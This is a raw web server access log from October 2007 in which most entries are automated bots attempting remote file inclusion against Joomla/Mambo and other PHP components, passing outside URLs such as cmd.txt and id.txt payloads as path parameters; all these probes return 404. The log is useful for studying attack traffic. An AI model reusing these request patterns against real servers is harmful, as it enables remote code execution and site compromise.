72.5.54.20 - - [21/Oct/2007:17:27:33 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.5.54.20 - - [21/Oct/2007:17:27:33 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
72.5.54.20 - - [21/Oct/2007:17:27:33 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
193.25.197.121 - - [21/Oct/2007:17:28:52 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.121 - - [21/Oct/2007:17:28:52 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.119.177.228 - - [21/Oct/2007:17:29:36 -0700] "GET /logs/access_071001.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.119.177.228 - - [21/Oct/2007:17:29:37 -0700] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.119.177.228 - - [21/Oct/2007:17:29:37 -0700] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.119.177.228 - - [21/Oct/2007:17:29:41 -0700] "GET /logs/access_070910.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.171.31.19 - - [21/Oct/2007:17:29:42 -0700] "GET /logs/access_070826.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:17:29:54 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
62.75.162.34 - - [21/Oct/2007:17:29:54 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:30:16 -0700] "GET /logs/access_070826.log/newspublish/include.php?path[docroot]=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.195.11.193 - - [21/Oct/2007:17:30:40 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.195.11.193 - - [21/Oct/2007:17:30:41 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.195.11.193 - - [21/Oct/2007:17:30:43 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.195.11.193 - - [21/Oct/2007:17:30:44 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.25.197.125 - - [21/Oct/2007:17:30:51 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.198.62.231 - - [21/Oct/2007:17:30:56 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
88.198.62.231 - - [21/Oct/2007:17:30:57 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
88.198.62.231 - - [21/Oct/2007:17:31:02 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
88.198.62.231 - - [21/Oct/2007:17:31:02 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.38.44.250 - - [21/Oct/2007:17:31:06 -0700] "GET /logs/access_070826.log/index.php?id=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.38.44.250 - - [21/Oct/2007:17:31:07 -0700] "GET /index.php?id=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.38.44.250 - - [21/Oct/2007:17:31:07 -0700] "GET /logs/index.php?id=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
88.198.62.231 - - [21/Oct/2007:17:31:10 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
88.198.62.231 - - [21/Oct/2007:17:31:10 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.27.168.253 - - [21/Oct/2007:17:31:21 -0700] "GET /logs/access_070820.log/nav.php?pagina=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.89.224.76 - - [21/Oct/2007:17:31:27 -0700] "GET /logs/access_071015.log HTTP/1.0" 200 1180619 "-" "Wget/1.10.2" "galf.org"
207.58.191.155 - - [21/Oct/2007:17:32:12 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.58.191.155 - - [21/Oct/2007:17:32:12 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.58.191.155 - - [21/Oct/2007:17:32:12 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
216.104.47.202 - - [21/Oct/2007:17:32:38 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.octium.ru/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.47.202 - - [21/Oct/2007:17:32:38 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.octium.ru/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.27.168.253 - - [21/Oct/2007:17:33:41 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.27.168.253 - - [21/Oct/2007:17:33:41 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.247.71.13 - - [21/Oct/2007:17:34:33 -0700] "GET /logs/access_070826.log/index1.php?=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
71.162.3.2 - - [21/Oct/2007:17:34:42 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
71.162.3.2 - - [21/Oct/2007:17:34:42 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.124.37.50 - - [21/Oct/2007:17:35:54 -0700] "GET /logs/access_071001.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:17:36:21 -0700] "GET /logs/access_070826.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.19.110 - - [21/Oct/2007:17:36:38 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
74.6.23.153 - - [21/Oct/2007:17:36:39 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
200.54.72.151 - - [21/Oct/2007:17:36:45 -0700] "GET /logs/access_070826.log/administrator/components/com_content/admin.content.php?mosConfig_absolute_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:17:36:49 -0700] "GET /logs/access_070826.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.16.206.128 - - [21/Oct/2007:17:37:10 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.16.206.128 - - [21/Oct/2007:17:37:10 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.191.155 - - [21/Oct/2007:17:37:42 -0700] "GET /logs/access_070917.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.23.16 - - [21/Oct/2007:17:38:10 -0700] "GET /?D=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
213.114.104.23 - - [21/Oct/2007:17:38:20 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.heroesofsand.110mb.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.237.222.54 - - [21/Oct/2007:17:38:26 -0700] "GET /logs/access_071008.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://c0cac0larul3z.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.237.222.54 - - [21/Oct/2007:17:38:27 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://c0cac0larul3z.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.237.222.54 - - [21/Oct/2007:17:38:27 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://c0cac0larul3z.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.237.222.54 - - [21/Oct/2007:17:38:54 -0700] "GET /logs/access_070625.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://c0cac0larul3z.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.159.60.133 - - [21/Oct/2007:17:38:54 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.159.60.133 - - [21/Oct/2007:17:38:55 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.159.60.133 - - [21/Oct/2007:17:38:55 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
74.6.26.150 - - [21/Oct/2007:17:39:08 -0700] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
74.6.25.120 - - [21/Oct/2007:17:39:27 -0700] "GET /?M=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
208.75.225.10 - - [21/Oct/2007:17:39:55 -0700] "GET /logs/access_070826.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.75.225.10 - - [21/Oct/2007:17:40:10 -0700] "GET /logs/access_070826.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:40:18 -0700] "GET /logs/access_070826.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.181.99.55 - - [21/Oct/2007:17:40:22 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ericsson-ringtones.com/ringtones-l5? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
202.181.99.55 - - [21/Oct/2007:17:40:22 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ericsson-ringtones.com/ringtones-l5? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
65.61.166.77 - - [21/Oct/2007:17:41:00 -0700] "GET /logs/access_070826.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
213.239.220.74 - - [21/Oct/2007:17:41:06 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
213.239.220.74 - - [21/Oct/2007:17:41:06 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.27.168.253 - - [21/Oct/2007:17:41:06 -0700] "GET /logs/access_070826.log/index.php?p=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.239.220.74 - - [21/Oct/2007:17:41:06 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
213.239.220.74 - - [21/Oct/2007:17:41:06 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
65.61.166.77 - - [21/Oct/2007:17:41:09 -0700] "GET /logs/access_070826.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.159.60.133 - - [21/Oct/2007:17:41:14 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.159.60.133 - - [21/Oct/2007:17:41:14 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.159.60.133 - - [21/Oct/2007:17:41:15 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:41:15 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:41:15 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:41:15 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:41:15 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.0.200.9 - - [21/Oct/2007:17:41:24 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:41:24 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.209.144.56 - - [21/Oct/2007:17:41:28 -0700] "GET /logs/access_071008.log/index1.php?inc=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
216.151.138.48 - - [21/Oct/2007:17:41:30 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:41:39 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:41:44 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:42:03 -0700] "GET /logs/access_070826.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:42:06 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:42:12 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.209.144.56 - - [21/Oct/2007:17:42:15 -0700] "GET /logs/access_070910.log/index1.php?inc=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:17:42:55 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:17:42:56 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:42:57 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:43:02 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:43:11 -0700] "GET /logs/access_070723.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.25.197.121 - - [21/Oct/2007:17:43:13 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
209.62.7.50 - - [21/Oct/2007:17:43:13 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:17:43:13 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:43:14 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.25.197.121 - - [21/Oct/2007:17:43:15 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:43:16 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.25.197.121 - - [21/Oct/2007:17:43:27 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.121 - - [21/Oct/2007:17:43:30 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:43:35 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
69.93.203.42 - - [21/Oct/2007:17:43:36 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:43:47 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
69.93.203.42 - - [21/Oct/2007:17:43:49 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.15.10.33 - - [21/Oct/2007:17:43:53 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
204.15.10.33 - - [21/Oct/2007:17:43:53 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [21/Oct/2007:17:43:54 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:17:44:28 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:17:44:29 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:17:44:42 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:17:44:44 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.205.60.84 - - [21/Oct/2007:17:47:29 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.galf.org"
